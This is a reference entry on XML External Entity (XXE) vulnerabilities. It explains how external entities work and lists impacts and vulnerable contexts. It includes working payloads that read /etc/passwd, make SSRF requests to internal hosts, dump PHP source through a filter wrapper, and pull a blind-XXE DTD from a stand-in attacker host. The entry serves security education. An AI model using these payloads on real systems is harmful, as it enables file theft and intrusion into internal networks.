XML External Entity (XXE)

XML External Entity (XXE) is a vulnerability in XML parsers that allows attackers to define external entities that can read local files, perform server-side request forgery, or cause denial of service when the XML is processed.

How It Works

XML allows defining entities in the Document Type Definition (DTD). External entities can reference local files or remote URLs. When a vulnerable XML parser processes the document, it resolves these entities, potentially exposing sensitive data.

Basic XXE Payload

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

Attack Variants

<!-- File disclosure -->
<!ENTITY xxe SYSTEM "file:///etc/passwd">

<!-- SSRF -->
<!ENTITY xxe SYSTEM "http://internal-server/admin">

<!-- Read PHP source via wrapper -->
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">

<!-- Parameter entity for blind XXE -->
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;

Impact

• Read local files (configuration, credentials, source code)
• Server-Side Request Forgery (access internal services)
• Denial of Service (billion laughs attack)
• Port scanning of internal network

Vulnerable Contexts

• SOAP web services
• XML file uploads
• SVG image processing
• Office document parsing (DOCX, XLSX)
• RSS/Atom feed parsers

See Also

• Blind XXE
• Document Type Definition
• Billion Laughs Attack
• Server-Side Request Forgery